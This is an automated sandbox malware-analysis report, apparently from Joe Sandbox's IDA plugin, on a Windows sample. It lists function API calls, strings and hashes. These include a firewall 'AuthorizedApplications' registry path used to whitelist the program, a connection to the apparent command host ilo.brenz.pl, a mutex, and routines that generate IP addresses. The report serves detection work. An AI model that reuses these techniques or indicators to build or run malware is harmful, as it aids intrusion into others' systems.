Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: File$AddressCloseCountCreateHandleLibraryLoadProcTickWrite
String ID: "'$"'$ADVAPI32.DLL$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 896256579-3465829191
Opcode ID: 725bb423a29dcd62c43598a103823de9de260c4f48a9b794d588fa8ccf6d82a8
Instruction ID: bbe40e1655c8ba2c17ea702bc694d41ea2ba27fb20882f208f31d8fd6de8f96b
Opcode Fuzzy Hash: 725bb423a29dcd62c43598a103823de9de260c4f48a9b794d588fa8ccf6d82a8
Instruction Fuzzy Hash: 7BA1F571514608BFEB36AF208C0ABEE37ACDF01701F00442BED199E191D6F85F0A86A9

Function 7FE33112 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 233libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(7FE33107), ref: 7FE33112

Part of subcall function 7FE33127: GetProcAddress.KERNEL32(00000000,7FE3311D), ref: 7FE33128
Part of subcall function 7FE33127: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE3313B
Part of subcall function 7FE33127: GetTickCount.KERNEL32 ref: 7FE3316F
Part of subcall function 7FE33127: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FE3637A,00000000,00000000,00000000,00000000), ref: 7FE33241
Part of subcall function 7FE33127: Sleep.KERNEL32(00000064,0000001E), ref: 7FE33288
Part of subcall function 7FE33127: DeleteFileA.KERNEL32(hell32.dll,-1), ref: 7FE3328F

Strings

"', xrefs: 7FE332BA
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE3330F
hell32.dll,-1, xrefs: 7FE3328E, 7FE3330E
ADVAPI32.DLL, xrefs: 7FE3313A

Memory Dump Source

Source File: 00000007.00000002.2043960210.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7fe30000_hrl97AF.jbxd

Similarity

API ID: LibraryLoad$AddressCountDeleteFileInformationProcSleepTickVolume
String ID: "'$ADVAPI32.DLL$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$hell32.dll,-1
API String ID: 3926103657-104948224
Opcode ID: b10989e1a19bd5d43d225fa2a3c42957d908225e734b95b6c14a3a6c700d835d
Instruction ID: d292d2856ce22b528264e3fb5c31764abc2e853f458007e39b67dc21da23dd02
Opcode Fuzzy Hash: b10989e1a19bd5d43d225fa2a3c42957d908225e734b95b6c14a3a6c700d835d
Instruction Fuzzy Hash: BD71D271915718BFEB269F20CC0EEEA37ADDF41311F80011AED5A9E081DAF4AF05D6A5

Function 009B3112 Relevance: 26.5, APIs: 11, Strings: 4, Instructions: 233libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(009B3107), ref: 009B3112

Part of subcall function 009B3127: GetProcAddress.KERNEL32(00000000,009B311D), ref: 009B3128
Part of subcall function 009B3127: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 009B313B
Part of subcall function 009B3127: GetTickCount.KERNEL32 ref: 009B316F
Part of subcall function 009B3127: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,009B637A,00000000,00000000,00000000,00000000), ref: 009B3241
Part of subcall function 009B3127: Sleep.KERNEL32(00000064,0000001E), ref: 009B3288
Part of subcall function 009B3127: DeleteFileA.KERNEL32(hell32.dll,-1), ref: 009B328F

Strings

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 009B330F
hell32.dll,-1, xrefs: 009B328E, 009B330E
ADVAPI32.DLL, xrefs: 009B313A
"', xrefs: 009B32BA

Memory Dump Source

Source File: 00000007.00000002.2043369977.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_9b0000_hrl97AF.jbxd

Similarity

API ID: LibraryLoad$AddressCountDeleteFileInformationProcSleepTickVolume
String ID: "'$ADVAPI32.DLL$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$hell32.dll,-1
API String ID: 3926103657-104948224
Opcode ID: b10989e1a19bd5d43d225fa2a3c42957d908225e734b95b6c14a3a6c700d835d
Instruction ID: 6367d5856d909d9778ff54df9e664ab6fcc1b1d6bb08b8c127aff0334a61cc33
Opcode Fuzzy Hash: b10989e1a19bd5d43d225fa2a3c42957d908225e734b95b6c14a3a6c700d835d
Instruction Fuzzy Hash: DC71F071514708BFEB26AF24CD0EBEA37ACEF41321F40411AFD199E081EAF49F0586A5

Function 7FE33127 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 240sleeplibraryfileCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,7FE3311D), ref: 7FE33128
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE3313B
GetTickCount.KERNEL32 ref: 7FE3316F
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FE3637A,00000000,00000000,00000000,00000000), ref: 7FE33241
Sleep.KERNEL32(00000064,0000001E), ref: 7FE33288
DeleteFileA.KERNEL32(hell32.dll,-1), ref: 7FE3328F
CreateThread.KERNEL32(00000000,00000000,7FE32C7D,00000000,00000000), ref: 7FE33343
CloseHandle.KERNEL32(?,0C1A4F68), ref: 7FE3334C
WSAStartup.WS2_32(00000101), ref: 7FE333D1
Sleep.KERNEL32(00001388,00000000,00000000), ref: 7FE333F3

Strings

"', xrefs: 7FE332BA
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE3330F
hell32.dll,-1, xrefs: 7FE3328E, 7FE3330E
ADVAPI32.DLL, xrefs: 7FE3313A

Memory Dump Source

Source File: 00000007.00000002.2043960210.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7fe30000_hrl97AF.jbxd

Similarity

API ID: Sleep$AddressCloseCountCreateDeleteFileHandleInformationLibraryLoadProcStartupThreadTickVolume
String ID: "'$ADVAPI32.DLL$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$hell32.dll,-1
API String ID: 2219344514-104948224
Opcode ID: 5b9ba073255788373456750f45873bb949f55a25902f1e72925c0e661daa5f85
Instruction ID: 9bf7545e8cb9496520d09b0b1350cb01679fb2f5a0313100841ffea94c71ba5e
Opcode Fuzzy Hash: 5b9ba073255788373456750f45873bb949f55a25902f1e72925c0e661daa5f85
Instruction Fuzzy Hash: 2871A271915718BFEB269F20DC0EBEA37ACEF41311F80011AED5A9E081DAF46F05D6A5

Function 009B3127 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 240sleeplibraryfileCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,009B311D), ref: 009B3128
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 009B313B
GetTickCount.KERNEL32 ref: 009B316F
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,009B637A,00000000,00000000,00000000,00000000), ref: 009B3241
Sleep.KERNEL32(00000064,0000001E), ref: 009B3288
DeleteFileA.KERNEL32(hell32.dll,-1), ref: 009B328F
CreateThread.KERNEL32(00000000,00000000,009B2C7D,00000000,00000000), ref: 009B3343
CloseHandle.KERNEL32(?,0C1A4F68), ref: 009B334C
WSAStartup.WS2_32(00000101), ref: 009B33D1
Sleep.KERNEL32(00001388,00000000,00000000), ref: 009B33F3

Strings

SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 009B330F
hell32.dll,-1, xrefs: 009B328E, 009B330E
ADVAPI32.DLL, xrefs: 009B313A
"', xrefs: 009B32BA

Memory Dump Source

Source File: 00000007.00000002.2043369977.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_9b0000_hrl97AF.jbxd

Similarity

API ID: Sleep$AddressCloseCountCreateDeleteFileHandleInformationLibraryLoadProcStartupThreadTickVolume
String ID: "'$ADVAPI32.DLL$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$hell32.dll,-1
API String ID: 2219344514-104948224
Opcode ID: 5b9ba073255788373456750f45873bb949f55a25902f1e72925c0e661daa5f85
Instruction ID: aaec6478a658d8c6968798f41a0a562a51e3c7f5033bc3cd5b347ad434cb9fe6
Opcode Fuzzy Hash: 5b9ba073255788373456750f45873bb949f55a25902f1e72925c0e661daa5f85
Instruction Fuzzy Hash: 4971D171514718BFEB25EF64CD0ABEA3BACEF41321F40411AFD199E081DAF46F0586A5

Function 0047FE1A Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 233libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(0047FE0F), ref: 0047FE1A

Part of subcall function 0047FE2F: GetProcAddress.KERNEL32(00000000,0047FE25), ref: 0047FE30
Part of subcall function 0047FE2F: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 0047FE43
Part of subcall function 0047FE2F: GetTickCount.KERNEL32 ref: 0047FE77
Part of subcall function 0047FE2F: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00483082,00000000,00000000,00000000,00000000), ref: 0047FF49
Part of subcall function 0047FE2F: Sleep.KERNEL32(00000064,0000001E), ref: 0047FF90
Part of subcall function 0047FE2F: DeleteFileA.KERNEL32(00482D28), ref: 0047FF97

Strings

"', xrefs: 0047FFC2
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 00480017
ADVAPI32.DLL, xrefs: 0047FE42

Memory Dump Source

Source File: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: LibraryLoad$AddressCountDeleteFileInformationProcSleepTickVolume
String ID: "'$ADVAPI32.DLL$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
API String ID: 3926103657-2346592412
Opcode ID: b10989e1a19bd5d43d225fa2a3c42957d908225e734b95b6c14a3a6c700d835d
Instruction ID: ca6f37dde20a556150d8b9aff03c10a4c9d3f2d00a63a1d16cbda09a3d529e5a
Opcode Fuzzy Hash: b10989e1a19bd5d43d225fa2a3c42957d908225e734b95b6c14a3a6c700d835d
Instruction Fuzzy Hash: 1471C571514718BFEB76AF619C0ABEE366CDF01301F00452BED199A082DAF85F4986A9

Function 7FE33392 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 177networksleeplibraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(7FE33386), ref: 7FE33392
WSAStartup.WS2_32(00000101), ref: 7FE333D1
Sleep.KERNEL32(00001388,00000000,00000000), ref: 7FE333F3
gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FE33412
lstrlen.KERNEL32(ilo.brenz.pl), ref: 7FE3341D
socket.WS2_32(00000002,00000001,00000000), ref: 7FE33453
connect.WS2_32(?,7FE32EB6,00000010), ref: 7FE3346D
GetVersionExA.KERNEL32(?,?,7FE32EB6,00000010), ref: 7FE334B7

Strings

ilo.brenz.pl, xrefs: 7FE33411, 7FE3341C
C:\Windows\sysWOW64\wbem\wmiprvse.exe, xrefs: 7FE33570, 7FE33590

Memory Dump Source

Source File: 00000007.00000002.2043960210.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7fe30000_hrl97AF.jbxd

Similarity

API ID: LibraryLoadSleepStartupVersionconnectgethostbynamelstrlensocket
String ID: C:\Windows\sysWOW64\wbem\wmiprvse.exe$ilo.brenz.pl
API String ID: 801863514-1010093679
Opcode ID: 174516e84d9c669cdc790a5bd5a266766651d9cd51a165662f06c8ce5e18c4ab
Instruction ID: ec9582b3104ee8db84d86a8e063e61350cf898793cca2a983ffbcde4064a8b90
Opcode Fuzzy Hash: 174516e84d9c669cdc790a5bd5a266766651d9cd51a165662f06c8ce5e18c4ab
Instruction Fuzzy Hash: 0361D132A04359BFEB22CF24C819FDE3BBDAF41715F440514E86A9E091D6F4AB04DBA5

Function 009B3392 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 177networksleeplibraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(009B3386), ref: 009B3392
WSAStartup.WS2_32(00000101), ref: 009B33D1
Sleep.KERNEL32(00001388,00000000,00000000), ref: 009B33F3
gethostbyname.WS2_32(ilo.brenz.pl), ref: 009B3412
lstrlen.KERNEL32(ilo.brenz.pl), ref: 009B341D
socket.WS2_32(00000002,00000001,00000000), ref: 009B3453
connect.WS2_32(?,009B2EB6,00000010), ref: 009B346D
GetVersionExA.KERNEL32(?,?,009B2EB6,00000010), ref: 009B34B7

Strings

C:\Windows\sysWOW64\wbem\wmiprvse.exe, xrefs: 009B3570, 009B3590
ilo.brenz.pl, xrefs: 009B3411, 009B341C

Memory Dump Source

Source File: 00000007.00000002.2043369977.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_9b0000_hrl97AF.jbxd

Similarity

API ID: LibraryLoadSleepStartupVersionconnectgethostbynamelstrlensocket
String ID: C:\Windows\sysWOW64\wbem\wmiprvse.exe$ilo.brenz.pl
API String ID: 801863514-1010093679
Opcode ID: 174516e84d9c669cdc790a5bd5a266766651d9cd51a165662f06c8ce5e18c4ab
Instruction ID: 861c87ccc95fe5057daf7307b359051e2e8503501d48962768b0e125d457cb83
Opcode Fuzzy Hash: 174516e84d9c669cdc790a5bd5a266766651d9cd51a165662f06c8ce5e18c4ab
Instruction Fuzzy Hash: D261F332604249BFDB31DF28C91ABDE3BADAF41721F044518F8699E082D7F49F058BA1

Function 00402730 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 83sleepsynchronizationCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(000001F4), ref: 004027A8
CreateMutexA.KERNEL32(00000000,00000000,100200), ref: 004027C8
GetLastError.KERNEL32 ref: 004027CE
ExitProcess.KERNEL32 ref: 004027DC
WaitForSingleObject.KERNEL32(00000000,000000FF,Function_000019C0,00000000), ref: 00402864
CloseHandle.KERNEL32(?), ref: 0040286D
Sleep.KERNEL32(0000012C), ref: 00402887

Strings

<6@, xrefs: 004027F7
X7@, xrefs: 0040274A
100200, xrefs: 0040273F, 004027C1
8@, xrefs: 00402838
j7@, xrefs: 00402744
hra%u.dll, xrefs: 004027F1

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: Sleep$CloseCreateErrorExitHandleLastMutexObjectProcessSingleWait
String ID: 100200$<6@$X7@$hra%u.dll$j7@$8@
API String ID: 482528292-700769639
Opcode ID: 1e47b03f81b28842055db56df177672559bc8670de47ada2c4e5fdc5ca35fded
Instruction ID: 4773f610d1753618e182b41886d2e1a4b90cb22de96b73be237ab8051f55e4f2
Opcode Fuzzy Hash: 1e47b03f81b28842055db56df177672559bc8670de47ada2c4e5fdc5ca35fded
Instruction Fuzzy Hash: B8315CB0554301AFD300AB71EF89F5A7AA9AB98704F11013EF585B21E2CFF958048F6C

Function 00404A93 Relevance: 21.3, APIs: 2, Strings: 10, Instructions: 287sleepthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00403B40: GetTickCount.KERNEL32 ref: 00403B41
Part of subcall function 00403B40: rand.MSVCRT ref: 00403B49

Sleep.KERNEL32(0000000A), ref: 00404E97
ExitThread.KERNEL32 ref: 00404EA3

Strings

p8@, xrefs: 00404B2E
<6@, xrefs: 00404D6B
P, xrefs: 00404C47
192.168.1.244, xrefs: 00404AD8
%d.%d.%d.%d, xrefs: 00404D65
E, xrefs: 00404BA3
8@, xrefs: 00404ACC
[@, xrefs: 00404B19
L8@, xrefs: 00404B7A
@, xrefs: 00404BBF

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: CountExitSleepThreadTickrand
String ID: %d.%d.%d.%d$192.168.1.244$<6@$@$E$L8@$P$p8@$8@$[@
API String ID: 896407411-3061671333
Opcode ID: 3410f6aa03986460e07f35c30161e885734b80fe57aac652988e95c7b84e40c9
Instruction ID: 87275159083c24ec72463f46727c3f40db5767b92ee09eca53101c8822c6a11e
Opcode Fuzzy Hash: 3410f6aa03986460e07f35c30161e885734b80fe57aac652988e95c7b84e40c9
Instruction Fuzzy Hash: F3B1BFB15083459AE710DF60C845B6FB7E5FFC4708F00092DFA89A7291DB74A609CB9B

Function 00405130 Relevance: 21.3, APIs: 2, Strings: 10, Instructions: 274sleepthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00403B40: GetTickCount.KERNEL32 ref: 00403B41
Part of subcall function 00403B40: rand.MSVCRT ref: 00403B49

Sleep.KERNEL32(0000000A), ref: 00405527
ExitThread.KERNEL32 ref: 00405533

Strings

p8@, xrefs: 004051BE
<6@, xrefs: 004053FB
192.168.1.244, xrefs: 00405168
%d.%d.%d.%d, xrefs: 004053F5
8@, xrefs: 0040515C
[@, xrefs: 004051A9
